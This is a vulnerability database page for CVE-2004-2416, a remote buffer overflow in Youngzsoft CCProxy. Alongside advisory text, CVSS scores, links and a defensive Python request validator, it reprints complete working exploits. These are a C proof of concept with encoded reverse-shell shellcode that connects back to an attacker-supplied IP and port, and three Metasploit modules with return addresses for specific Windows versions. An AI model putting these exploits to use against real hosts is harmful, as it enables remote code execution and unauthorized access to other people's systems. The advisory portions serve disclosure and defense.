CVE-2004-2416
CVSS 7.5
Published: 2004-12-31 00:00:00
Last modified: 2008-09-05 16:44:04

[Original] Buffer overflow in the logging component of CCProxy allows remote attackers to execute arbitrary code via a long HTTP GET request.


[CNNVD] Youngzsoft CCProxy Logging Function Unspecified Remote Buffer Overflow Vulnerability (CNNVD-200412-343)

        A buffer overflow exists in the CCProxy logging component. A remote attacker can execute arbitrary code by means of an overly long GET request.

- CVSS (base score)

CVSS score: 7.5 [HIGH]
Confidentiality impact: PARTIAL [information disclosure is likely]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: PARTIAL [may degrade performance or interrupt access to resources]
Access complexity: LOW [no access restrictions on exploitation]
Access vector: [--]
Authentication: NONE [no authentication required to exploit]

- CPE (affected platforms and products)

Product and version information (CPE) not yet available

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2416
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-2416
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200412-343
(official data source) CNNVD

- Other links and resources

http://secunia.com/advisories/13085
(VENDOR_ADVISORY)  SECUNIA  13085
http://xforce.iss.net/xforce/xfdb/18012
(UNKNOWN)  XF  proxy-server-ccproxy-bo(18012)
http://www.securityfocus.com/bid/11666
(UNKNOWN)  BID  11666
http://www.securiteam.com/exploits/6E0032KBPM.html
(UNKNOWN)  MISC  http://www.securiteam.com/exploits/6E0032KBPM.html
http://www.osvdb.org/11593
(UNKNOWN)  OSVDB  11593
http://securitytracker.com/id?1012189
(UNKNOWN)  SECTRACK  1012189

- Vulnerability information

Youngzsoft CCProxy Logging Function Unspecified Remote Buffer Overflow Vulnerability
High  Buffer overflow
2004-12-31 00:00:00 2005-10-20 00:00:00
Remote
        A buffer overflow exists in the CCProxy logging component. A remote attacker can execute arbitrary code by means of an overly long GET request.

- Advisories and patches

        Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: mailto:vuldb@securityfocus.com.

- Vulnerability information (619)

CCProxy Log Remote Stack Overflow Exploit (EDBID:619)
windows remote
2004-11-09 Verified
808 Ruder
N/A
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>
#include <winsock.h>

#pragma comment(lib, "ws2_32")


unsigned char EndChar[]=
"\x20\x48\x54\x54\x50\x2F\x31\x2E\x30\x0D\x0A\x0D\x0A";
// " HTTP/1.0\r\n\r\n"

unsigned char shellcode[] =
"\xeb\x0e\x5b\x4b\x33\xc9\xb1\xfe\x80\x34\x0b\xee\xe2\xfa\xeb\x05"

"\xe8\xed\xff\xff\xff"

/* 254 bytes shellcode, xor with 0xee */
/* offset 92=IP offset 99=PORT*/
"\x07\x36\xee\xee\xee\xb1\x8a\x4f\xde\xee\xee\xee\x65\xae\xe2\x65"

"\x9e\xf2\x43\x65\x86\xe6\x65\x19\x84\xea\xb7\x06\x96\xee\xee\xee"

"\x0c\x17\x86\xdd\xdc\xee\xee\x86\x99\x9d\xdc\xb1\xba\x11\xf8\x7b"

"\x84\xed\xb7\x06\x8e\xee\xee\xee\x0c\x17\xbf\xbf\xbf\xbf\x84\xef"

"\x84\xec\x11\xb8\xfe\x7d\x86\x91\xee\xee\xef\x86\xec\xee\xee\xdb"

"\x65\x02\x84\xfe\xbb\xbd\x11\xb8\xfa\x6b\x2e\x9b\xd6\x65\x12\x84"

"\xfc\xb7\x45\x0c\x13\x88\x29\xaa\xca\xd2\xef\xef\x7d\x45\x45\x45"

"\x65\x12\x86\x8d\x83\x8a\xee\x65\x02\xbe\x63\xa9\xfe\xb9\xbe\xbf"

"\xbf\xbf\x84\xef\xbf\xbf\xbb\xbf\x11\xb8\xea\x84\x11\x11\xd9\x11"

"\xb8\xe2\x11\xb8\xf6\x11\xb8\xe6\xbf\xb8\x65\x9b\xd2\x65\x9a\xc0"

"\x96\xed\x1b\xb8\x65\x98\xce\xed\x1b\xdd\x27\xa7\xaf\x43\xed\x2b"

"\xdd\x35\xe1\x50\xfe\xd4\x38\x9a\xe6\x2f\x25\xe3\xed\x34\xae\x05"

"\x1f\xd5\xf1\x9b\x09\xb0\x65\xb0\xca\xed\x33\x88\x65\xe2\xa5\x65"

"\xb0\xf2\xed\x33\x65\xea\x65\xed\x2b\x45\xb0\xb7\x2d\x06\xcd\x11"

"\x11\x11\x60\xa0\xe0\x02\x9c\x10\x5d\xf8\x01\x20\x0e\x8e\x43\x37"

"\xeb\x20\x37\xe7\x1b\x43\x02\x17\x44\x8e\x09\x97\x28\x97";

/*

+------------------------------------------------------------------------------+
| |inc edx...inc edx|shellcode|0x7ffa54cd| | |
+------------------------------------------------------------------------------+
      +0x42 +shellcode +IPLen( IP )=4065

    :
mov ecx,0x12811111
shr ecx,0x14
sub esp,ecx
jmp esp

                        
1.
2. ecx inc edx
*/

void start(void)
{
printf("CCProxy Log Stack Overflow Exploit!\n");
printf("written by Ruder 11/2004\n");
printf("Bug found by Isno, see xfocus.com\n");
printf("Homepage: http://ruder.cdut.net\n");
printf("E-mail: cocoruder@163.com\n");
}

int main(int argc, char *argv[])
{
WSADATA wsd;
SOCKET sClient;
int ret, i,tmp;
struct sockaddr_in server,local;
struct hostent *host = NULL;
int IPLen;
int a;
char buff[4096] = {0};
char *IPStr;
u_short tmp1;
char *PORTStr;

start();

if(argc != 5)
{
printf("usage: %s target port backIP backPort\n", argv[0]);
exit(1);
}

if (WSAStartup(MAKEWORD(2,2), &wsd) != 0)
{
printf("Failed to load Winsock library!\n");
return 1;
}

sClient = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
if (sClient == INVALID_SOCKET)
{
printf("socket() failed: %d\n", WSAGetLastError());
return 1;
}

// patch the connect-back IP into the shellcode; the bytes are xor-encoded with 0xee
tmp=inet_addr(argv[3]);
IPStr=(char*)&tmp;

shellcode[92]=IPStr[0]^0xee; // IP
shellcode[93]=IPStr[1]^0xee;
shellcode[94]=IPStr[2]^0xee;
shellcode[95]=IPStr[3]^0xee;

// patch the connect-back port the same way
tmp1=htons((u_short)atoi(argv[4]));
PORTStr=(char*)&tmp1;

shellcode[99]=PORTStr[0]^0xee; // PORT
shellcode[100]=PORTStr[1]^0xee;

server.sin_family = AF_INET;
server.sin_port = htons((u_short)atoi(argv[2]));
server.sin_addr.s_addr = inet_addr(argv[1]);
if (server.sin_addr.s_addr == INADDR_NONE)
{
host = gethostbyname(argv[1]);
if (host == NULL)
{
printf("Unable to resolve server: %s\n", argv[1]);
return 1;
}
CopyMemory(&server.sin_addr, host->h_addr_list[0], host->h_length);
}

// connect to the target proxy
if (connect(sClient, (struct sockaddr *)&server, sizeof(server)) == SOCKET_ERROR)
{
printf("connect() failed: %d\n", WSAGetLastError());
return 1;
}

// the padding computed below subtracts the length of our own IP address as text
a=sizeof(struct sockaddr_in);

// local address of the connected socket
if (getsockname(sClient,(struct sockaddr *)&local,&a)==SOCKET_ERROR)
{
printf("getsockname() failed: %d\n", WSAGetLastError());
return 1;
}
IPLen=strlen(inet_ntoa(local.sin_addr));


// request line starts with "GET /"
buff[0]=0x47;
buff[1]=0x45;
buff[2]=0x54;
buff[3]=0x20;
buff[4]=0x2F;

// pad with 0x42 (INC EDX) so that padding + shellcode + IPLen totals 4065
tmp=4065-sizeof(shellcode)-5-IPLen+1;
for(i=5;i<tmp+5;i++)
{
buff[i]=0x42;
}

CopyMemory(&buff[i],shellcode,sizeof(shellcode));
i=i+sizeof(shellcode)-1;

buff[i]=0xCD;   // 0x7ffa54cd, little-endian
buff[i+1]=0x54;
buff[i+2]=0xFA;
buff[i+3]=0x7F;

i=i+4;
// mov ecx,0x12811111 ; shr ecx,0x14 ; sub esp,ecx ; jmp esp
buff[i++]=0xB9;
buff[i++]=0x11;
buff[i++]=0x11;
buff[i++]=0x81;
buff[i++]=0x12;
buff[i++]=0xC1;
buff[i++]=0xE9;
buff[i++]=0x14;
buff[i++]=0x2B;
buff[i++]=0xE1;
buff[i++]=0xFF;
buff[i++]=0xE4;

// terminate the request line with " HTTP/1.0\r\n\r\n"
CopyMemory(&buff[i],EndChar,sizeof(EndChar));
i=i+sizeof(EndChar);

ret=send(sClient,buff,i-1,0);

printf("send... buffer ok! good luck!\n");

closesocket(sClient);
WSACleanup();
return 0;
}

// milw0rm.com [2004-11-09]
		

- Vulnerability information (16689)

CCProxy <= v6.2 Telnet Proxy Ping Overflow (EDBID:16689)
windows remote
2010-04-30 Verified
23 metasploit
N/A
##
# $Id: ccproxy_telnet_ping.rb 9179 2010-04-30 08:40:19Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'		=> 'CCProxy <= v6.2 Telnet Proxy Ping Overflow',
			'Description'	=> %q{
					This module exploits the YoungZSoft CCProxy <= v6.2 suite
				Telnet service. The stack is overwritten when sending an overly
				long address to the 'ping' command.
			},
			'Author' 	=> [ 'Patrick Webster <patrick[at]aushack.com>' ],
			'Arch'		=> [ ARCH_X86 ],
			'License'       => MSF_LICENSE,
			'Version'       => '$Revision: 9179 $',
			'References'    =>
				[
					[ 'CVE', '2004-2416' ],
					[ 'OSVDB', '11593' ],
					[ 'BID', '11666' ],
					[ 'URL', 'http://milw0rm.com/exploits/621' ],
				],
			'Privileged'		=> false,
			'DefaultOptions'	=>
				{
					'EXITFUNC' 	=> 'thread',
				},
			'Payload' =>
				{
					'Space'		=> 1012,
					'BadChars' 	=> "\x00\x07\x08\x0a\x0d\x20",
				},
			'Platform' => ['win'],
			'Targets' =>
				[
					# Patrick - Tested OK 2007/08/19. W2K SP0, W2KSP4, XP SP0, XP SP2 EN.
					[ 'Windows 2000 Pro All - English', { 'Ret' => 0x75023411 } ], # call esi ws2help.dll
					[ 'Windows 2000 Pro All - Italian', { 'Ret' => 0x74fd2b81 } ], # call esi ws2help.dll
					[ 'Windows 2000 Pro All - French',  { 'Ret' => 0x74fa2b22 } ], # call esi ws2help.dll
					[ 'Windows XP SP0/1 - English',     { 'Ret' => 0x71aa1a97 } ], # call esi ws2help.dll
					[ 'Windows XP SP2 - English',	    { 'Ret' => 0x71aa1b22 } ], # call esi ws2help.dll
				],
			'DisclosureDate' => 'Nov 11 2004'))

		register_options(
			[
				Opt::RPORT(23),
			], self.class)
	end

	def check
		connect
		banner = sock.get_once(-1,3)
		disconnect

		if (banner =~ /CCProxy Telnet Service Ready/)
			return Exploit::CheckCode::Appears
		end
		return Exploit::CheckCode::Safe
	end

	def exploit
		connect

		sploit  = "p " + payload.encoded + [target['Ret']].pack('V') + make_nops(7)
		sock.put(sploit + "\r\n")

		handler
		disconnect
	end

end
		

- Vulnerability information (F83074)

CCProxy <= v6.2 Telnet Proxy Ping Overflow (PacketStormID:F83074)
2009-11-26 00:00:00
Patrick Webster  metasploit.com
exploit
CVE-2004-2416

This Metasploit module exploits the YoungZSoft CCProxy <= v6.2 suite Telnet service. The stack is overwritten when sending an overly long address to the 'ping' command.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/ 
##

require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote
	
	include Msf::Exploit::Remote::Tcp

	def initialize(info = {}) 
		super(update_info(info,    
			'Name'		=> 'CCProxy <= v6.2 Telnet Proxy Ping Overflow',
			'Description'	=> %q{
            			This module exploits the YoungZSoft CCProxy <= v6.2 suite
            			Telnet service. The stack is overwritten when sending an overly
            			long address to the 'ping' command.
			},
			'Author' 	=> [ 'Patrick Webster <patrick[at]aushack.com>' ],
			'Arch'		=> [ ARCH_X86 ], 
			'License'       => MSF_LICENSE,
			'Version'       => '$Revision$',
			'References'    =>
			[
				[ 'CVE', '2004-2416' ],
				[ 'OSVDB', '11593' ],
				[ 'BID', '11666' ],
				[ 'URL', 'http://milw0rm.com/exploits/621' ],
			],         
			'Privileged'		=> false,
			'DefaultOptions'	=>
			{
				'EXITFUNC' 	=> 'thread',
			},
			'Payload' =>
				{ 
					'Space'		=> 1012,
					'BadChars' 	=> "\x00\x07\x08\x0a\x0d\x20",
				},
			'Platform' => ['win'],
			'Targets' =>
			[
				# Patrick - Tested OK 2007/08/19. W2K SP0, W2KSP4, XP SP0, XP SP2 EN.
				[ 'Windows 2000 Pro All - English', { 'Ret' => 0x75023411 } ], # call esi ws2help.dll
				[ 'Windows 2000 Pro All - Italian', { 'Ret' => 0x74fd2b81 } ], # call esi ws2help.dll
				[ 'Windows 2000 Pro All - French',  { 'Ret' => 0x74fa2b22 } ], # call esi ws2help.dll
				[ 'Windows XP SP0/1 - English',     { 'Ret' => 0x71aa1a97 } ], # call esi ws2help.dll
				[ 'Windows XP SP2 - English',	    { 'Ret' => 0x71aa1b22 } ], # call esi ws2help.dll
			],
			'DisclosureDate' => 'Nov 11 2004'))
            
			register_options(
			[
				Opt::RPORT(23),
			], self.class)
	end

	def autofilter
		false
	end

	def check
		connect
		banner = sock.get_once(-1,3)
		disconnect

		if (banner =~ /CCProxy Telnet Service Ready/)
			return Exploit::CheckCode::Appears
		end
		return Exploit::CheckCode::Safe
	end

	def exploit
		connect
		
		sploit  = "p " + payload.encoded + [target['Ret']].pack('V') + make_nops(7)
		sock.put(sploit + "\r\n")

		handler
		disconnect
	end

end
    

- Vulnerability information (F59050)

ccproxy-meta.txt (PacketStormID:F59050)
2007-09-05 00:00:00
Patrick Webster
exploit
CVE-2004-2416

This Metasploit module exploits the YoungZSoft CCProxy suite versions 6.2 and below Telnet service. The stack is overwritten when sending an overly long address to the 'ping' command.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/ 
##

require 'msf/core'

module Msf

class Exploits::Windows::Proxy::CCProxy_Telnet_Ping < Msf::Exploit::Remote
	
	include Exploit::Remote::Tcp

	def initialize(info = {}) 
		super(update_info(info,    
			'Name'		=> 'CCProxy <= v6.2 Telnet Proxy Ping Overflow',
			'Description'	=> %q{
            			This module exploits the YoungZSoft CCProxy <= v6.2 suite Telnet service.
				The stack is overwritten when sending an overly long address to the 'ping' command.
			},
			'Author' 	=> [ 'Patrick Webster <patrick[at]aushack.com>' ],
			'Arch'		=> [ ARCH_X86 ], 
			'License'       => MSF_LICENSE,
			'Version'       => '$Revision$',
			'References'    =>
			[
				[ 'BID', '11666' ],
				[ 'CVE', '2004-2416' ],
				[ 'MIL', '621' ],
				[ 'OSVDB', '11593' ],
			],         
			'Privileged'		=> false,
			'DefaultOptions'	=>
			{
				'EXITFUNC' 	=> 'thread',
			},
			'Payload' =>
				{ 
					'Space'		=> 1012,
					'BadChars' 	=> "\x00\x07\x08\x0a\x0d",
				},
			'Platform' => ['win'],
			'Targets' =>
			[
			# Patrick - Tested OK 2007/08/19. W2K SP0, W2KSP4, XP SP0, XP SP2 EN.
				[
				'Windows 2000 Pro All - English',
				{
					'Ret'	=> 0x75023411, # call esi ws2help.dll
				}
				],
				[
				'Windows 2000 Pro All - Italian',
				{
					'Ret'	=> 0x74fd2b81, # call esi ws2help.dll
				}
				],
				[
				'Windows 2000 Pro All - French',
				{
					'Ret'	=> 0x74fa2b22, # call esi ws2help.dll
				}
				],
                 		[
				'Windows XP SP0/1 - English',
				{
					'Ret'	=> 0x71aa1a97, # call esi ws2help.dll
				}
				],
                 		[
				'Windows XP SP2 - English',
				{
					'Ret'	=> 0x71aa1b22, # call esi ws2help.dll
				}
				],
			],
			'DisclosureDate' => 'Nov 11 2004'))
            
			register_options(
			[
				Opt::RPORT(23),
			], self.class)
	end

	def autofilter
		false
	end

	def check
		connect
		banner = sock.get_once(-1,3)
		disconnect

		if (banner =~ /CCProxy Telnet Service Ready/)
			return Exploit::CheckCode::Appears
		end
		return Exploit::CheckCode::Safe
	end

	def exploit
		connect
		
		sploit  = "p " + payload.encoded + [target['Ret']].pack('V') + make_nops(7)
		sock.put(sploit + "\r\n")

		handler
		disconnect
	end

end
end

    

- Vulnerability information

11593
CCProxy Logging Component HTTP GET Request Remote Overflow
Remote / Network Access; Input Manipulation
Loss of Integrity; Upgrade
Exploit Public; Vendor Verified

- Vulnerability description

A remote overflow exists in CCProxy. The logging component fails to validate user-supplied GET requests resulting in a buffer overflow. With a specially crafted request, an attacker can cause arbitrary code execution resulting in a loss of integrity.
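As an added illustration of the missing validation described above (example code written for this page, not CCProxy's own code nor part of the record), the check below inspects the request line of a raw HTTP request and flags the two traits a long GET of this kind shares: an oversized line and non-printable bytes. The 2048-byte bound, the 64-byte log truncation and the two sample requests are assumptions constructed for the example.

```python
import re

# Constructed sample requests (not captured traffic): a normal proxy GET and one
# whose target is padded to about the 4065-byte size the public exploit uses,
# followed by four non-printable bytes standing in for a return address.
BENIGN = b"GET /index.html HTTP/1.0\r\nHost: proxy.example\r\n\r\n"
OVERSIZED = b"GET /" + b"B" * 4060 + b"\xcd\x54\xfa\x7f" + b" HTTP/1.0\r\n\r\n"

MAX_REQUEST_LINE = 2048  # assumed safe upper bound for a proxy request line
REQUEST_LINE_RE = re.compile(rb"^([A-Z]{3,7}) (\S+) HTTP/\d\.\d$")


def inspect_request(raw: bytes, max_len: int = MAX_REQUEST_LINE) -> dict:
    """Inspect the first line of a raw HTTP request and return a verdict.

    Findings are raised before the target is parsed or logged: a request
    line longer than max_len, bytes outside printable ASCII, and a line that
    does not match the request-line grammar. 'accept' is True only when no
    finding was raised.
    """
    line, _, _ = raw.partition(b"\r\n")
    findings = []
    if len(line) > max_len:
        findings.append("request line is %d bytes, limit %d" % (len(line), max_len))
    if any(b < 0x20 or b > 0x7E for b in line):
        findings.append("non-printable bytes in request line")
    match = REQUEST_LINE_RE.match(line)
    if match is None:
        findings.append("malformed request line")
    return {
        "method": match.group(1).decode("ascii") if match else None,
        "length": len(line),
        "findings": findings,
        "accept": not findings,
    }


def log_safe_target(raw: bytes, max_len: int = MAX_REQUEST_LINE) -> str:
    """Return a truncated, escaped form of the request target that is safe to
    write into a fixed-size log record, the place where this overflow lived.
    A request whose line is not well-formed yields an empty string."""
    verdict = inspect_request(raw, max_len)
    if verdict["method"] is None:
        return ""
    target = raw.partition(b"\r\n")[0].split(b" ")[1]
    shown = target[:64].decode("ascii", "backslashreplace")
    return shown + ("..." if len(target) > 64 else "")
```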

- Timeline

2004-11-05 Unknown
2004-11-05 Unknown

- Solution

Upgrade to version 6.2 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- References

- Vulnerability author

- Vulnerability information

Youngzsoft CCProxy Logging Function Unspecified Remote Buffer Overflow Vulnerability
Boundary Condition Error  11666
Remote: Yes  Local: No
2004-11-11 12:00:00 2007-09-05 06:51:00
Discovery is credited to Isno.

- Affected program versions

Youngzsoft CCProxy 6.0

- Vulnerability discussion

CCProxy is reported prone to an unspecified remote buffer-overflow vulnerability. Exploiting this issue may allow remote attackers to execute arbitrary code on a vulnerable computer and gain unauthorized access.

All versions of CCProxy are considered vulnerable at this time.

- Exploit

Exploit code as well as a Metasploit module are available:

- Solution

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: mailto:vuldb@securityfocus.com.

- References
